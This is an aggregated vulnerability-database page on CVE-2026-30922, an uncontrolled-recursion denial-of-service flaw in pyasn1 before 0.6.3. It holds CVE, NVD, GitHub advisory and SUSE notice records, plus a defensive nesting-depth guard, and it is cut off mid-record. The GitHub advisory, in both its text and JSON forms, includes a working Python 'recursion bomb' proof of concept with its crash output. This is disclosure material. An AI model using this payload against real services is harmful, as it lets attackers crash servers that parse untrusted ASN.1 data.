CVE-2026-30922 (GCVE-0-2026-30922)
Vulnerability from cvelistv5 – Published: 2026-03-18 02:29 – Updated: 2026-03-21 00:16
CWE-674 - Uncontrolled Recursion
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-30922",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-03-18T20:16:18.738732Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-03-18T20:17:53.102Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2026-03-21T00:16:47.028Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "http://www.openwall.com/lists/oss-security/2026/03/20/4"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "pyasn1",
"vendor": "pyasn1",
"versions": [
{
"status": "affected",
"version": "\u003c 0.6.3"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "pyasn1 is a generic ASN.1 library for Python. Prior to 0.6.3, the `pyasn1` library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing thousands of nested `SEQUENCE` (`0x30`) or `SET` (`0x31`) tags with \"Indefinite Length\" (`0x80`) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a `RecursionError` or consumes all available memory (OOM), crashing the host application. This is a distinct vulnerability from CVE-2026-23490 (which addressed integer overflows in OID decoding). The fix for CVE-2026-23490 (`MAX_OID_ARC_CONTINUATION_OCTETS`) does not mitigate this recursion issue. Version 0.6.3 fixes this specific issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-674",
"description": "CWE-674: Uncontrolled Recursion",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-03-18T02:29:45.857Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r"
},
{
"name": "https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0"
}
],
"source": {
"advisory": "GHSA-jr27-m4p2-rc6r",
"discovery": "UNKNOWN"
},
"title": "pyasn1 Vulnerable to Denial of Service via Unbounded Recursion"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-30922",
"datePublished": "2026-03-18T02:29:45.857Z",
"dateReserved": "2026-03-07T16:40:05.884Z",
"dateUpdated": "2026-03-21T00:16:47.028Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
GHSA-JR27-M4P2-RC6R
Vulnerability from github – Published: 2026-03-17 16:17 – Updated: 2026-03-25 18:25
Summary
The pyasn1 library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing nested SEQUENCE (0x30) or SET (0x31) tags with Indefinite Length (0x80) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a RecursionError or consumes all available memory (OOM), crashing the host application.
Details
The vulnerability exists because the decoder iterates through the input stream and recursively calls decodeFun (the decoding callback) for every nested component found, without tracking or limiting the recursion depth.
Vulnerable Code Locations:
1. `indefLenValueDecoder` (Line 998):
   `for component in decodeFun(substrate, asn1Spec, allowEoo=True, **options):`
   This method handles indefinite-length constructed types. It sits inside a `while True` loop and recursively calls the decoder for every nested tag.
2. `valueDecoder` (Lines 786 and 907):
   `for component in decodeFun(substrate, componentType, **options):`
   This method handles standard decoding when a schema is present. It contains two distinct recursive calls that lack depth checks: Line 786: Recursively decodes components of `SEQUENCE` or `SET` types. Line 907: Recursively decodes elements of `SEQUENCE OF` or `SET OF` types.
3. `_decodeComponentsSchemaless` (Line 661):
   `for component in decodeFun(substrate, **options):`
   This method handles decoding when no schema is provided.
In all three cases, decodeFun is invoked without passing a depth parameter or checking against a global MAX_ASN1_NESTING limit.
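A pre-decode guard of the kind this paragraph says is missing, as an added example (it is not pyasn1 code and not the 0.6.3 fix): it walks BER headers with an explicit stack instead of recursion and rejects input whose constructed types nest deeper than a limit. The names `max_nesting_depth`, `within_nesting_limit` and `NestingLimitExceeded`, the limit of 100, and the sample byte strings are assumptions made for this example.

```python
"""Iterative BER nesting-depth guard (added example; not pyasn1 code)."""

NESTING_LIMIT = 100  # assumed policy value for this example, not pyasn1's

# Constructed sample inputs, built for this example.
DEFINITE_SAMPLE = bytes.fromhex("300702010130020500")      # SEQUENCE{INTEGER, SEQUENCE{NULL}}
INDEFINITE_SAMPLE = bytes.fromhex("30803080050000000000")  # two indefinite SEQUENCEs, closed
DEEP_SAMPLE = b"\x30\x80" * 50_000  # the nesting pattern the advisory describes


class NestingLimitExceeded(ValueError):
    """Constructed types nest deeper than the allowed limit."""


def _read_header(data, pos, bound):
    """Parse one identifier+length header at pos.

    Returns (constructed, length, next_pos); length is None for the
    indefinite form (0x80). Never reads at or past bound.
    """
    if pos >= bound:
        raise ValueError("truncated identifier octet")
    first = data[pos]
    pos += 1
    constructed = bool(first & 0x20)
    if first & 0x1F == 0x1F:  # high-tag-number form: skip continuation octets
        while True:
            if pos >= bound:
                raise ValueError("truncated tag number")
            octet = data[pos]
            pos += 1
            if not octet & 0x80:
                break
    if pos >= bound:
        raise ValueError("truncated length octet")
    first_len = data[pos]
    pos += 1
    if first_len < 0x80:   # short form
        return constructed, first_len, pos
    if first_len == 0x80:  # indefinite form
        return constructed, None, pos
    if first_len == 0xFF:
        raise ValueError("reserved length octet 0xFF")
    count = first_len & 0x7F  # long form: count octets hold the length
    if pos + count > bound:
        raise ValueError("truncated long-form length")
    return constructed, int.from_bytes(data[pos:pos + count], "big"), pos + count


def max_nesting_depth(data, limit=NESTING_LIMIT):
    """Return the deepest nesting of constructed types seen in data.

    Raises NestingLimitExceeded as soon as depth exceeds limit, and
    ValueError on malformed headers. Input that simply ends while containers
    are still open is left for the real decoder to report as truncated.
    """
    pos, deepest, end = 0, 0, len(data)
    stack = []  # one (is_indefinite, content_bound) entry per open container
    while pos < end:
        bound = end
        if stack:
            indefinite, bound = stack[-1]
            if not indefinite and pos == bound:
                stack.pop()  # definite-length container fully consumed
                continue
            if indefinite and pos + 2 <= bound and data[pos:pos + 2] == b"\x00\x00":
                stack.pop()  # end-of-contents octets close the container
                pos += 2
                continue
        constructed, length, pos = _read_header(data, pos, bound)
        if not constructed:
            if length is None:
                raise ValueError("primitive type with indefinite length")
            if pos + length > bound:
                raise ValueError("value overruns its container")
            pos += length
            continue
        content_end = bound if length is None else pos + length
        if content_end > bound:
            raise ValueError("container overruns its parent")
        stack.append((length is None, content_end))
        deepest = max(deepest, len(stack))
        if len(stack) > limit:
            raise NestingLimitExceeded(f"nesting deeper than {limit}")
    return deepest


def within_nesting_limit(data, limit=NESTING_LIMIT):
    """True only if data has walkable headers and nests no deeper than limit."""
    try:
        max_nesting_depth(data, limit)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    for name in ("DEFINITE_SAMPLE", "INDEFINITE_SAMPLE", "DEEP_SAMPLE"):
        print(name, "accepted" if within_nesting_limit(globals()[name]) else "rejected")
```

Calling `within_nesting_limit()` on untrusted bytes before handing them to the decoder bounds the work done per message on versions that lack the depth check; it complements the upgrade to 0.6.3 rather than replacing it.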
PoC
```
import sys
from pyasn1.codec.ber import decoder

# Raise the interpreter's recursion limit so the decoder can recurse further
sys.setrecursionlimit(100000)

print("[*] Generating Recursion Bomb Payload...")
depth = 50_000
# 0x30 = SEQUENCE tag, 0x80 = indefinite-length marker
chunk = b'\x30\x80'
payload = chunk * depth

print(f"[*] Payload size: {len(payload) / 1024:.2f} KB")
print("[*] Triggering Decoder...")

try:
    decoder.decode(payload)
except RecursionError:
    print("[!] Crashed: Recursion Limit Hit")
except MemoryError:
    print("[!] Crashed: Out of Memory")
except Exception as e:
    print(f"[!] Crashed: {e}")
```

```
[*] Payload size: 9.77 KB
[*] Triggering Decoder...
[!] Crashed: Recursion Limit Hit
```
Impact
- This is an unhandled runtime exception that typically terminates the worker process or thread handling the request. This allows a remote attacker to trivially kill service workers with a small payload (<100KB), resulting in a Denial of Service. Furthermore, in environments where recursion limits are increased, this leads to server-wide memory exhaustion.
- Service Crash: Any service using `pyasn1` to parse untrusted ASN.1 data (e.g., LDAP, SNMP, Kerberos, X.509 parsers) can be crashed remotely.
- Resource Exhaustion: The attack consumes RAM linearly with the nesting depth. A small payload (<200KB) can consume hundreds of megabytes of RAM or exhaust the stack.
Credits
Vulnerability discovered by Kevin Tu of TMIR at ByteDance.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.6.2"
},
"package": {
"ecosystem": "PyPI",
"name": "pyasn1"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.6.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-30922"
],
"database_specific": {
"cwe_ids": [
"CWE-674"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-17T16:17:33Z",
"nvd_published_at": "2026-03-18T04:17:18Z",
"severity": "HIGH"
},
"details": "### Summary\nThe `pyasn1` library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing nested `SEQUENCE` (`0x30`) or `SET` (`0x31`) tags with Indefinite Length (`0x80`) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a `RecursionError` or consumes all available memory (OOM), crashing the host application.\n\n### Details\nThe vulnerability exists because the decoder iterates through the input stream and recursively calls `decodeFun` (the decoding callback) for every nested component found, without tracking or limiting the recursion depth.\nVulnerable Code Locations:\n1. `indefLenValueDecoder` (Line 998):\n```for component in decodeFun(substrate, asn1Spec, allowEoo=True, **options):```\nThis method handles indefinite-length constructed types. It sits inside a `while True` loop and recursively calls the decoder for every nested tag.\n\n2. `valueDecoder` (Lines 786 and 907):\n```for component in decodeFun(substrate, componentType, **options):```\nThis method handles standard decoding when a schema is present. It contains two distinct recursive calls that lack depth checks: Line 786: Recursively decodes components of `SEQUENCE` or `SET` types. Line 907: Recursively decodes elements of `SEQUENCE OF` or `SET OF` types.\n\n4. 
`_decodeComponentsSchemaless` (Line 661):\n```for component in decodeFun(substrate, **options):```\nThis method handles decoding when no schema is provided.\n\nIn all three cases, `decodeFun` is invoked without passing a `depth` parameter or checking against a global `MAX_ASN1_NESTING` limit.\n\n### PoC\n```\nimport sys\nfrom pyasn1.codec.ber import decoder\n\nsys.setrecursionlimit(100000)\n\nprint(\"[*] Generating Recursion Bomb Payload...\")\ndepth = 50_000\nchunk = b\u0027\\x30\\x80\u0027 \npayload = chunk * depth\n\nprint(f\"[*] Payload size: {len(payload) / 1024:.2f} KB\")\nprint(\"[*] Triggering Decoder...\")\n\ntry:\n decoder.decode(payload)\nexcept RecursionError:\n print(\"[!] Crashed: Recursion Limit Hit\")\nexcept MemoryError:\n print(\"[!] Crashed: Out of Memory\")\nexcept Exception as e:\n print(f\"[!] Crashed: {e}\")\n```\n\n```\n[*] Payload size: 9.77 KB\n[*] Triggering Decoder...\n[!] Crashed: Recursion Limit Hit\n```\n\n### Impact\n- This is an unhandled runtime exception that typically terminates the worker process or thread handling the request. This allows a remote attacker to trivially kill service workers with a small payload (\u003c100KB), resulting in a Denial of Service. Furthermore, in environments where recursion limits are increased, this leads to server-wide memory exhaustion.\n- Service Crash: Any service using `pyasn1` to parse untrusted ASN.1 data (e.g., LDAP, SNMP, Kerberos, X.509 parsers) can be crashed remotely.\n- Resource Exhaustion: The attack consumes RAM linearly with the nesting depth. A small payload (\u003c200KB) can consume hundreds of megabytes of RAM or exhaust the stack.\n\n### Credits\nVulnerability discovered by Kevin Tu of TMIR at ByteDance.",
"id": "GHSA-jr27-m4p2-rc6r",
"modified": "2026-03-25T18:25:07Z",
"published": "2026-03-17T16:17:33Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30922"
},
{
"type": "WEB",
"url": "https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0"
},
{
"type": "WEB",
"url": "https://github.com/pyasn1/pyasn1/commit/5a49bd1fe93b5b866a1210f6bf0a3924f21572c8"
},
{
"type": "PACKAGE",
"url": "https://github.com/pyasn1/pyasn1"
},
{
"type": "WEB",
"url": "https://github.com/pyasn1/pyasn1/releases/tag/v0.6.3"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2026/03/20/4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Denial of Service in pyasn1 via Unbounded Recursion"
}
FKIE_CVE-2026-30922
Vulnerability from fkie_nvd - Published: 2026-03-18 04:17 - Updated: 2026-03-21 01:17
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:pyasn1:pyasn1:*:*:*:*:*:python:*:*",
"matchCriteriaId": "3F5F876E-E9B5-45D9-AE85-5E3E35AD09D7",
"versionEndExcluding": "0.6.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "pyasn1 is a generic ASN.1 library for Python. Prior to 0.6.3, the `pyasn1` library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing thousands of nested `SEQUENCE` (`0x30`) or `SET` (`0x31`) tags with \"Indefinite Length\" (`0x80`) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a `RecursionError` or consumes all available memory (OOM), crashing the host application. This is a distinct vulnerability from CVE-2026-23490 (which addressed integer overflows in OID decoding). The fix for CVE-2026-23490 (`MAX_OID_ARC_CONTINUATION_OCTETS`) does not mitigate this recursion issue. Version 0.6.3 fixes this specific issue."
},
{
"lang": "es",
"value": "pyasn1 es una biblioteca ASN.1 gen\u00e9rica para Python. Antes de la versi\u00f3n 0.6.3, la biblioteca \u0027pyasn1\u0027 es vulnerable a un ataque de denegaci\u00f3n de servicio (DoS) causado por recursi\u00f3n incontrolada al decodificar datos ASN.1 con estructuras profundamente anidadas. Un atacante puede suministrar una carga \u00fatil manipulada que contenga miles de etiquetas \u0027SEQUENCE\u0027 (\u00270x30\u0027) o \u0027SET\u0027 (\u00270x31\u0027) anidadas con marcadores de \u0027Longitud Indefinida\u0027 (\u00270x80\u0027). Esto fuerza al decodificador a llamarse recursivamente hasta que el int\u00e9rprete de Python falla con un \u0027RecursionError\u0027 o consume toda la memoria disponible (OOM), provocando la ca\u00edda de la aplicaci\u00f3n anfitriona. Esta es una vulnerabilidad distinta de CVE-2026-23490 (que abord\u00f3 desbordamientos de enteros en la decodificaci\u00f3n de OID). La soluci\u00f3n para CVE-2026-23490 (\u0027MAX_OID_ARC_CONTINUATION_OCTETS\u0027) no mitiga este problema de recursi\u00f3n. La versi\u00f3n 0.6.3 soluciona este problema espec\u00edfico."
}
],
"id": "CVE-2026-30922",
"lastModified": "2026-03-21T01:17:06.360",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-03-18T04:17:18.397",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.openwall.com/lists/oss-security/2026/03/20/4"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-674"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
OPENSUSE-SU-2026:10393-1
Vulnerability from csaf_opensuse - Published: 2026-03-19 00:00 - Updated: 2026-03-19 00:00
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "python311-pyasn1-0.6.3-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the python311-pyasn1-0.6.3-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2026-10393",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_10393-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-30922 page",
"url": "https://www.suse.com/security/cve/CVE-2026-30922/"
}
],
"title": "python311-pyasn1-0.6.3-1.1 on GA media",
"tracking": {
"current_release_date": "2026-03-19T00:00:00Z",
"generator": {
"date": "2026-03-19T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2026:10393-1",
"initial_release_date": "2026-03-19T00:00:00Z",
"revision_history": [
{
"date": "2026-03-19T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "python311-pyasn1-0.6.3-1.1.aarch64",
"product": {
"name": "python311-pyasn1-0.6.3-1.1.aarch64",
"product_id": "python311-pyasn1-0.6.3-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python313-pyasn1-0.6.3-1.1.aarch64",
"product": {
"name": "python313-pyasn1-0.6.3-1.1.aarch64",
"product_id": "python313-pyasn1-0.6.3-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "python311-pyasn1-0.6.3-1.1.ppc64le",
"product": {
"name": "python311-pyasn1-0.6.3-1.1.ppc64le",
"product_id": "python311-pyasn1-0.6.3-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python313-pyasn1-0.6.3-1.1.ppc64le",
"product": {
"name": "python313-pyasn1-0.6.3-1.1.ppc64le",
"product_id": "python313-pyasn1-0.6.3-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "python311-pyasn1-0.6.3-1.1.s390x",
"product": {
"name": "python311-pyasn1-0.6.3-1.1.s390x",
"product_id": "python311-pyasn1-0.6.3-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python313-pyasn1-0.6.3-1.1.s390x",
"product": {
"name": "python313-pyasn1-0.6.3-1.1.s390x",
"product_id": "python313-pyasn1-0.6.3-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "python311-pyasn1-0.6.3-1.1.x86_64",
"product": {
"name": "python311-pyasn1-0.6.3-1.1.x86_64",
"product_id": "python311-pyasn1-0.6.3-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python313-pyasn1-0.6.3-1.1.x86_64",
"product": {
"name": "python313-pyasn1-0.6.3-1.1.x86_64",
"product_id": "python313-pyasn1-0.6.3-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-pyasn1-0.6.3-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-pyasn1-0.6.3-1.1.aarch64"
},
"product_reference": "python311-pyasn1-0.6.3-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-pyasn1-0.6.3-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-pyasn1-0.6.3-1.1.ppc64le"
},
"product_reference": "python311-pyasn1-0.6.3-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-pyasn1-0.6.3-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-pyasn1-0.6.3-1.1.s390x"
},
"product_reference": "python311-pyasn1-0.6.3-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-pyasn1-0.6.3-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-pyasn1-0.6.3-1.1.x86_64"
},
"product_reference": "python311-pyasn1-0.6.3-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-pyasn1-0.6.3-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-pyasn1-0.6.3-1.1.aarch64"
},
"product_reference": "python313-pyasn1-0.6.3-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-pyasn1-0.6.3-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-pyasn1-0.6.3-1.1.ppc64le"
},
"product_reference": "python313-pyasn1-0.6.3-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-pyasn1-0.6.3-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-pyasn1-0.6.3-1.1.s390x"
},
"product_reference": "python313-pyasn1-0.6.3-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-pyasn1-0.6.3-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-pyasn1-0.6.3-1.1.x86_64"
},
"product_reference": "python313-pyasn1-0.6.3-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-30922",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-30922"
}
],
"notes": [
{
"category": "general",
"text": "pyasn1 is a generic ASN.1 library for Python. Prior to 0.6.3, the `pyasn1` library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing thousands of nested `SEQUENCE` (`0x30`) or `SET` (`0x31`) tags with \"Indefinite Length\" (`0x80`) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a `RecursionError` or consumes all available memory (OOM), crashing the host application. This is a distinct vulnerability from CVE-2026-23490 (which addressed integer overflows in OID decoding). The fix for CVE-2026-23490 (`MAX_OID_ARC_CONTINUATION_OCTETS`) does not mitigate this recursion issue. Version 0.6.3 fixes this specific issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:python311-pyasn1-0.6.3-1.1.aarch64",
"openSUSE Tumbleweed:python311-pyasn1-0.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:python311-pyasn1-0.6.3-1.1.s390x",
"openSUSE Tumbleweed:python311-pyasn1-0.6.3-1.1.x86_64",
"openSUSE Tumbleweed:python313-pyasn1-0.6.3-1.1.aarch64",
"openSUSE Tumbleweed:python313-pyasn1-0.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:python313-pyasn1-0.6.3-1.1.s390x",
"openSUSE Tumbleweed:python313-pyasn1-0.6.3-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-30922",
"url": "https://www.suse.com/security/cve/CVE-2026-30922"
},
{
"category": "external",
"summary": "SUSE Bug 1259803 for CVE-2026-30922",
"url": "https://bugzilla.suse.com/1259803"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:python311-pyasn1-0.6.3-1.1.aarch64",
"openSUSE Tumbleweed:python311-pyasn1-0.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:python311-pyasn1-0.6.3-1.1.s390x",
"openSUSE Tumbleweed:python311-pyasn1-0.6.3-1.1.x86_64",
"openSUSE Tumbleweed:python313-pyasn1-0.6.3-1.1.aarch64",
"openSUSE Tumbleweed:python313-pyasn1-0.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:python313-pyasn1-0.6.3-1.1.s390x",
"openSUSE Tumbleweed:python313-pyasn1-0.6.3-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:python311-pyasn1-0.6.3-1.1.aarch64",
"openSUSE Tumbleweed:python311-pyasn1-0.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:python311-pyasn1-0.6.3-1.1.s390x",
"openSUSE Tumbleweed:python311-pyasn1-0.6.3-1.1.x86_64",
"openSUSE Tumbleweed:python313-pyasn1-0.6.3-1.1.aarch64",
"openSUSE Tumbleweed:python313-pyasn1-0.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:python313-pyasn1-0.6.3-1.1.s390x",
"openSUSE Tumbleweed:python313-pyasn1-0.6.3-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-19T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-30922"
}
]
}
SUSE-SU-2026:20821-1
Vulnerability from csaf_suse - Published: 2026-03-24 09:09 - Updated: 2026-03-24 09:09
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for python-pyasn1",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for python-pyasn1 fixes the following issue:\n\n- CVE-2026-30922: Denial of Service via Unbounded Recursion (bsc#1259803).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-SLE-Micro-6.0-637",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
